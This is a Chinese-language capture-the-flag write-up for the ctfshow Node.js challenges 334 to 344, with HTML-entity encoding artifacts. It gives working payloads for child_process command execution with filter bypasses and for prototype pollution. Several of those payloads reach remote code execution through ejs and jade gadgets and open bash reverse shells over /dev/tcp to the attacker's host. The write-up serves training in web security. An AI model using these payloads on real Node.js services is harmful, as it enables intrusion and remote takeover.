ctfshownodejs篇

334

源码给了 登录成功就能拿到flag

var express &＃61; require(&＃39;express&＃39;);
var router &＃61; express.Router();
var users &＃61; require(&＃39;../modules/user&＃39;).items;var findUser &＃61; function(name, password){return users.find(function(item){return name!&＃61;&＃61;&＃39;CTFSHOW&＃39; && item.username &＃61;&＃61;&＃61; name.toUpperCase() && item.password &＃61;&＃61;&＃61; password;});
};/* GET home page. */
router.post(&＃39;/&＃39;, function(req, res, next) {res.type(&＃39;html&＃39;);var flag&＃61;&＃39;flag_here&＃39;;var sess &＃61; req.session;var user &＃61; findUser(req.body.username, req.body.password);if(user){req.session.regenerate(function(err) {if(err){return res.json({ret_code: 2, ret_msg: &＃39;登录失败&＃39;}); }req.session.loginUser &＃61; user.username;res.json({ret_code: 0, ret_msg: &＃39;登录成功&＃39;,ret_flag:flag}); });}else{res.json({ret_code: 1, ret_msg: &＃39;账号或密码错误&＃39;});} });module.exports &＃61; router;


看到这里的判断逻辑

只要把给的用户名全改为小写就行了 登录&＃xff1a;ctfshow 123456

335

源码里给了提示&＃xff0c;应该是命令执行
这里直接用nodejs执行shell命令的paylaod就可以了
具体可以看官方文档 http://nodejs.cn/api/child_process.html
?eval&＃61;require(&＃39;child_process&＃39;).execSync(&＃39;cat f*&＃39;)

336

跟335一样的环境&＃xff0c;但同样的payload打不通了 估计存在关键字过滤了
换一个方法读
?eval&＃61;require( &＃39;child_process&＃39; ).spawnSync( &＃39;cat&＃39;, [ &＃39;fl00g.txt&＃39; ] ).stdout.toString()
字符串拼接也可以
?eval&＃61;require(&＃39;child_process&＃39;)[&＃39;ex&＃39;&＃43;&＃39;ecSync&＃39;](&＃39;cat f*&＃39;)(要url编码一下&＃xff0c;&＃43;号会被url解析为空格)

337

源码直接给了
看这里

if(a && b && a.length&＃61;&＃61;&＃61;b.length && a!&＃61;&＃61;b && md5(a&＃43;flag)&＃61;&＃61;&＃61;md5(b&＃43;flag)){res.end(flag);}else{res.render(&＃39;index&＃39;,{ msg: &＃39;tql&＃39;});}


这里很简单的逻辑 用数组绕过即可
?a[]&＃61;1&b&＃61;1

338

源码里有copy函数&＃xff0c;很明显的原型链污染

login.js

var express &＃61; require(&＃39;express&＃39;);
var router &＃61; express.Router();
var utils &＃61; require(&＃39;../utils/common&＃39;);/* GET home page. */
router.post(&＃39;/&＃39;, require(&＃39;body-parser&＃39;).json(),function(req, res, next) {res.type(&＃39;html&＃39;);var flag&＃61;&＃39;flag_here&＃39;;var secert &＃61; {};var sess &＃61; req.session;let user &＃61; {};utils.copy(user,req.body);if(secert.ctfshow&＃61;&＃61;&＃61;&＃39;36dboy&＃39;){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: &＃39;登录失败&＃39;&＃43;JSON.stringify(user)}); }});module.exports &＃61; router;


只要满足secert.ctfshow&＃61;&＃61;&＃61;‘36dboy’就能拿到flag
看到utils.copy(user,req.body)知道利用原型链污染
{"__proto__":{"ctfshow":"36dboy"}}

339

这题源码多了个api.js 并且原来原型链污染的地方做了点改动
api.js

var express &＃61; require(&＃39;express&＃39;);
var router &＃61; express.Router();
var utils &＃61; require(&＃39;../utils/common&＃39;);/* GET home page. */
router.post(&＃39;/&＃39;, require(&＃39;body-parser&＃39;).json(),function(req, res, next) {res.type(&＃39;html&＃39;);res.render(&＃39;api&＃39;, { query: Function(query)(query)});});module.exports &＃61; router;

改动的地方

这个不太好利用了&＃xff0c;关键在api.js文件里面&＃xff0c;参考羽师傅的wp&＃xff0c;有个预期解和非预期解
https://blog.csdn.net/miuzzx/article/details/111780832
这里利用变量覆盖控制query的值

function copy(object1, object2){for (let key in object2) {if (key in object2 && key in object1) {copy(object1[key], object2[key])} else {object1[key] &＃61; object2[key]}}}
var user &＃61;{}
body&＃61;JSON.parse(&＃39;{"__proto__":{"query":"return 123"}}&＃39;);
copy(user,body);
console.log(query);


运行上面代码可以发现query已经被赋值了
我们要利用这个原理给api.js中的query赋值
payload

{"__proto__":{"query":"return global.process.mainModule.constructor._load(&＃39;child_process&＃39;).exec(&＃39;bash -c \"bash -i >& /dev/tcp/你的公网ip地址/端口 0>&1\"&＃39;)"}}


在login路由发包&＃xff0c;再用post方法访问/api即可反弹shell&＃xff0c;flag在login.js里

340

跟339一个原理&＃xff0c;但有个修改

只不过这次user.__proto__.___proto__才是Object&＃xff0c;所以要向上两层
{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load(&＃39;child_process&＃39;).exec(&＃39;bash -c \"bash -i >& /dev/tcp/你的公网ip/1234 0>&1\"&＃39;)"}}}

341

这题没了api.js 要用到前面339和340的非预期解
ejs的rce可以参考这篇文章ejs rce
跟340一样需要两层__proto__
payload
{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(&＃39;child_process&＃39;).exec(&＃39;bash -c \"bash -i >& /dev/tcp/你的公网ip/1234 0>&1\"&＃39;);var __tmp2"}}}

342

这题改了一下

原来的ejs变成了jade&＃xff0c;不过jade也存在原型链污染
jade原型链污染
payload
{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require(&＃39;child_process&＃39;).execSync(&＃39;bash -c \"bash -i >& /dev/tcp/你的公网ip/1234 0>&1\"&＃39;)"}}}
记得发包的时候改成application/json

343

跟342一样&＃xff0c;虽然做了过滤&＃xff0c;但还是可以用

344

源码很短

router.get(&＃39;/&＃39;, function(req, res, next) {res.type(&＃39;html&＃39;);var flag &＃61; &＃39;flag_here&＃39;;if(req.url.match(/8c|2c|\,/ig)){res.end(&＃39;where is flag :)&＃39;);}var query &＃61; JSON.parse(req.query.query);if(query.name&＃61;&＃61;&＃61;&＃39;admin&＃39;&&query.password&＃61;&＃61;&＃61;&＃39;ctfshow&＃39;&&query.isVIP&＃61;&＃61;&＃61;true){res.end(flag);}else{res.end(&＃39;where is flag. :)&＃39;);}});


原来?query&＃61;{"name":"admin","password":"ctfshow","isVIP":true}
逗号被过滤了,用&代替 所以变成
?query&＃61;{"name":"admin"&query&＃61;"password":"ctfshow"&query&＃61;"isVIP":true}
但2c被过滤了&＃xff0c;双引号的url编码为%22会跟ctfshow前面的c拼接成2c&＃xff0c;所以需要将c编码
?query&＃61;{"name":"admin"&query&＃61;"password":"%63tfshow"&query&＃61;"isVIP":true}